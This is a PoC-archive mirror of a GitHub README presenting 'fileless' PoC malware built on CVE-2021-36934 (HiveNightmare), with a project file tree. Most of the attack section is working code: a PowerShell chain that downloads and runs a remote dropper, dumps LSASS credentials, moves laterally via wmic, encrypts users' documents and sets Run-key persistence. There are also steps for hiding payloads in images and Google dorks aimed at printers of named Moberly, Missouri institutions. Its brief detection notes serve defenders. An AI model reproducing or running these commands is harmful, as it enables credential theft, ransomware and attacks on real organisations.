Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-36934 PoC — Windows Elevation of Privilege Vulnerability

Source
https://github.com/P1rat3R00t/Why-so-Serious-SAM
Associated Vulnerability
Title:Windows Elevation of Privilege Vulnerability (CVE-2021-36934)
Description:<p>An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p> <p>An attacker must have the ability to execute code on a victim system to exploit this vulnerability.</p> <p>After installing this security update, you <em>must</em> manually delete all shadow copies of system files, including the SAM database, to fully mitigate this vulnerabilty. <strong>Simply installing this security update will not fully mitigate this vulnerability.</strong> See <a href="https://support.microsoft.com/topic/1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7">KB5005357- Delete Volume Shadow Copies</a>.</p>
Description
PoC malware that uses exploit CVE-2021-36934 (improper ACLs on shadow copies) using a fileless red team method on Windows 10/11 with LOLBins, extracting SYSTEM and SAM hives for local NTLM hashes.
Readme


# HiveNightmare 'Fileless' Exploit PoC:

![Screenshot 2025-05-21 001453](https://github.com/user-attachments/assets/15ccb34b-483d-497a-8fa9-70f0f61232d6)

---

## Table of Contents

- [Overview](#overview)
- [Features](#features)
- [Lab Simulation Example](#lab-simulation-example)
- [Reconnaissance with Google Dorks](#reconnaissance-with-google-dorks)
- [LOLBins Overview](#lolbins-overview)
- [Fileless Dropper Embedding](#fileless-dropper-embedding)
- [Exploiting Print Spooler & HiveNightmare](#exploiting-print-spooler--hivenightmare)
- [Reflective DLL Injection](#reflective-dll-injection)
- [MITRE ATT&CK Mapping](#mitre-attck-mapping)
- [Detection & Mitigation](#detection--mitigation)
- [Legal Disclaimer](#legal-disclaimer)
- [References & Further Reading](#references--further-reading)

---

## Overview

**CVE-2021-36934/HiveNightmare** is an educational red/purple team research project that simulates a **fileless malware** attack framework on **Windows 11**. It enables the emulation of real-world adversary kill chains using [MITRE ATT&CK](https://attack.mitre.org/) techniques, with a focus on stealthy, fileless operations.

> **Warning:** For research and training in isolated labs only. **Do not use on production or unauthorized systems.**

---

## Features

- Simulates end-to-end fileless ransomware/wiperware attacks
- Demonstrates use of Living Off the Land Binaries (LOLBins)
- Showcases credential access, privilege escalation, lateral movement, and persistence
- Contains practical lab and reconnaissance examples
- Maps to MITRE ATT&CK for blue team detection exercises

---

## Lab Simulation Example

The following PowerShell simulation demonstrates a typical fileless ransomware attack chain using built-in Windows tools (LOLBins):

```powershell
# Initial Access: Load dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Decode and load in-memory payload
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]::Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# File Encryption Example
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistence
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"
```

---

## Reconnaissance with Google Dorks

**Example Objective:** Identify publicly exposed printer services in Moberly, Missouri, potentially vulnerable to exploits like PrintNightmare.

**Sample Google Dork Queries:**

```
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"
```

---

## LOLBins Overview

**Living Off the Land Binaries (LOLBins)** are legitimate, trusted Windows binaries commonly abused by adversaries to bypass security controls and run malicious code filelessly.

**Example Use (Print Service Attack):**

```cmd
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry
```

> Attackers use LOLBins like `rundll32.exe`, `regsvr32.exe`, and `powershell.exe` to execute payloads from network shares, often after identifying exposed printers or servers via reconnaissance.

---

## Fileless Dropper Embedding

**Goal:** Deliver payloads covertly by embedding archives within images and extracting them using native tools.

**Steps:**

1. **Embed Payload:**
   ```bash
   copy /b nsfw.jpg + payload.7z nsfw.jpg
   ```

2. **Extract & Decode:**
   ```cmd
   certutil -decode nsfw.jpg dropper.7z
   7z x dropper.7z -oC:\Users\Public\
   ```

> This method bypasses traditional file extension filtering and leverages built-in tools for evasive delivery.

---

## Reflective DLL Injection

**Technique:** Load and execute a malicious DLL directly in memory using reflective loading.

**Example:**
```cmd
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry
```

> This enables stealthy, in-memory execution without leaving artifacts on disk.

---

## MITRE ATT&CK Mapping

| Phase                | Technique                               | ID                   | Description                                              |
|----------------------|-----------------------------------------|----------------------|----------------------------------------------------------|
| Initial Access       | Valid Accounts / Drive-by Compromise    | T1078, T1189         | Compromising public-facing print interfaces              |
| Execution            | DLL Side-Loading / LOLBins              | T1218, T1055.001     | Running DLLs reflectively via trusted binaries           |
| Privilege Escalation | Print Spooler Exploits / Hive ACL Abuse | T1068, T1003.002     | SYSTEM-level access and SAM hash extraction              |
| Defense Evasion      | Fileless Execution / Obfuscated Files   | T1027, T1202         | Encoded payloads delivered via certutil, mshta, etc.     |
| Credential Access    | LSASS Dumping / SAM Hive Access         | T1003                | Credential dumping post HiveNightmare                    |
| Lateral Movement     | SMB/Net Share Enumeration               | T1021.002            | Spread via printer shares or spooler enumeration         |
| Impact               | Data Destruction / Encryption           | T1485, T1486         | Fileless wiperware triggered via DLL payloads            |

---

## Detection & Mitigation

### Detection

- **Sysmon + Sigma Rules:**
  - Monitor `rundll32.exe` loading non-system DLLs
  - Watch for abnormal use of `certutil.exe`, `regsvr32.exe`, `mshta.exe`
  - Track shadow volume access by non-admins

- **SIEM Examples (ELK/Splunk):**
  - Alerts on execution from public shares
  - Parent/child process anomalies (e.g., `explorer.exe` spawning `rundll32.exe`)
  - Suspicious encoded commands in PowerShell or CMD

### Mitigation

- Disable Print Spooler where not needed:
  ```cmd
  Stop-Service -Name Spooler -Force
  Set-Service -Name Spooler -StartupType Disabled
  ```
- Apply all security patches and harden ACLs
- Block or restrict LOLBins with AppLocker or WDAC
- Use EDR solutions that detect reflective DLL loading and in-memory attacks

---

## Legal Disclaimer

> **All content, code, and techniques in this repository are for educational and authorized penetration testing only. Do not use any part of this project outside of controlled, isolated environments and without explicit permission. The authors assume no liability for misuse.**

---

## References & Further Reading

- [LOLOL Farm – LOLBin Playground](https://lolol.farm/)
- [LOLGEN – Generate LOLBin Chains](https://lolgen.hdks.org/)
- [Detecting SeriousSam](https://medium.com/@mvelazco/detecting-serioussam-cve-2021-36934-with-splunk-855dcbb10076)
- [DLL Injection Primer](https://www.crow.rip/crows-nest/mal/dev/inject/dll-injection)
- [Print Spooler Exploit Chain](https://itm4n.github.io/printnightmare-not-over/)
- [Fileless Malware – Wikipedia](https://en.wikipedia.org/wiki/Fileless_malware)
- [PrintSpoofer (Original)](https://github.com/itm4n/PrintSpoofer/tree/master)
- [HiveNightmare](https://github.com/GossiTheDog/HiveNightmare)
- [Mitre Attck T1055](https://attack.mitre.org/techniques/T1055/001/)
- [Hivenightmare demo](https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5)

---

**Stay safe, research responsibly, and always use in a legal and ethical manner.**
File Snapshot

 [4.0K]  /data/pocs/34f213a244a2b70b450ce8e6df554865b22fda04
├── [4.0K]  core
│   ├── [ 219]  build_sfx.ps1
│   ├── [ 787]  build_windows.bat
│   ├── [  59]  config.txt
│   ├── [4.0K]  nightmare
│   │   ├── [6.1K]  dll_inject.cpp
│   │   ├── [ 925]  dllmain.cpp
│   │   ├── [ 154]  framework.h
│   │   ├── [6.0K]  hive_nightmare.cpp
│   │   ├── [4.0K]  include
│   │   │   ├── [ 659]  data_wipe.h
│   │   │   ├── [3.1K]  defines.h
│   │   │   ├── [2.9K]  devhook.h
│   │   │   ├── [ 983]  device_io.h
│   │   │   ├── [ 794]  fast_crypt.h
│   │   │   ├── [ 501]  misc.h
│   │   │   ├── [ 771]  misc_mem.h
│   │   │   ├── [505K]  ntifs.h
│   │   │   └── [ 219]  prng.h
│   │   ├── [8.4K]  nightmare.vcxproj
│   │   ├── [1.3K]  nightmare.vcxproj.filters
│   │   ├── [ 168]  nightmare.vcxproj.user
│   │   ├── [4.3K]  nsfw.cpp
│   │   ├── [ 694]  nsfw.h
│   │   ├── [ 191]  pch.cpp
│   │   ├── [ 576]  pch.h
│   │   └── [4.0K]  x64
│   │       ├── [4.0K]  Debug
│   │       │   ├── [ 62K]  nightmare.dll
│   │       │   └── [1.6M]  nightmare.pdb
│   │       └── [4.0K]  Release
│   │           ├── [102K]  nightmare.dll
│   │           └── [4.1M]  nightmare.pdb
│   └── [1.4K]  nightmare.sln
├── [177K]  dropper.pdf
├── [4.0K]  lab
│   ├── [4.0K]  atomic red
│   │   ├── [1.3K]  run_tests.py
│   │   └── [4.0K]  tests
│   │       └── [1.7K]  hive_nightmare.yml
│   ├── [4.0K]  caldera
│   │   ├── [ 799]  deploy_caldera.sh
│   │   └── [4.0K]  plugin
│   │       └── [ 320]  songbird.yaml
│   ├── [4.0K]  docs
│   │   ├── [162K]  13007-reflective-dll-injection.pdf
│   │   ├── [ 72K]  Fileless-malware-Matko-Antun-Bekavac.pdf
│   │   └── [1.5M]  hivenightmare-aka-serious-sam-cve-2021-36934.pdf
│   ├── [4.0K]  logs
│   │   └── [1.0K]  export_logs.ps1
│   ├── [4.0K]  lolbins
│   │   ├── [3.1K]  attempted_credential_dump_from_registry_via_reg_exe.yml
│   │   ├── [3.3K]  certutil_download_with_urlcache_and_split_arguments.yml
│   │   ├── [3.5K]  certutil_with_decode_argument.yml
│   │   ├── [1.8K]  command_and_control_certutil_network_connection.toml
│   │   ├── [1.5K]  credential_access_dump_registry_hives.toml
│   │   ├── [1.6K]  defense_evasion_suspicious_certutil_commands.toml
│   │   ├── [1.9K]  defense_evasion_unusual_network_connection_via_rundll32.toml
│   │   ├── [1.6K]  Netsh.yml
│   │   ├── [1.8K]  powershell.yml
│   │   ├── [1.3K]  proc_creation_win_certutil_download.yml
│   │   ├── [1.2K]  proc_creation_win_certutil_encode.yml
│   │   ├── [ 610]  proc_creation_win_lolbin_pktmon.yml
│   │   ├── [1.0K]  proc_creation_win_netsh_helper_dll_persistence.yml
│   │   ├── [2.1K]  proc_creation_win_reg_dumping_sensitive_hives.yml
│   │   ├── [1.1K]  proc_creation_win_regedit_import_keys_ads.yml
│   │   ├── [1.2K]  proc_creation_win_regedit_import_keys.yml
│   │   ├── [3.9K]  proc_creation_win_rundll32_susp_activity.yml
│   │   ├── [2.1K]  processes_created_by_netsh.yml
│   │   ├── [2.7K]  processes_launching_netsh.yml
│   │   ├── [3.9K]  Rundll32.yml
│   │   ├── [1.7K]  Schtasks.yml
│   │   ├── [2.3K]  Sc.yml
│   │   ├── [ 14K]  the_lolbas_project.json
│   │   └── [117K]  The_LOLBAS_Project.svg
│   ├── [4.0K]  loldrivers
│   │   ├── [611K]  275c80c5-a67c-4536-b29e-4e481242cb01.md
│   │   └── [283K]  275c80c5-a67c-4536-b29e-4e481242cb01.yaml
│   ├── [1.9K]  mitigation.ps1
│   └── [2.3K]  rundll32_dump.txt
├── [1.1K]  LICENSE
└── [8.3K]  README.md

15 directories, 67 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →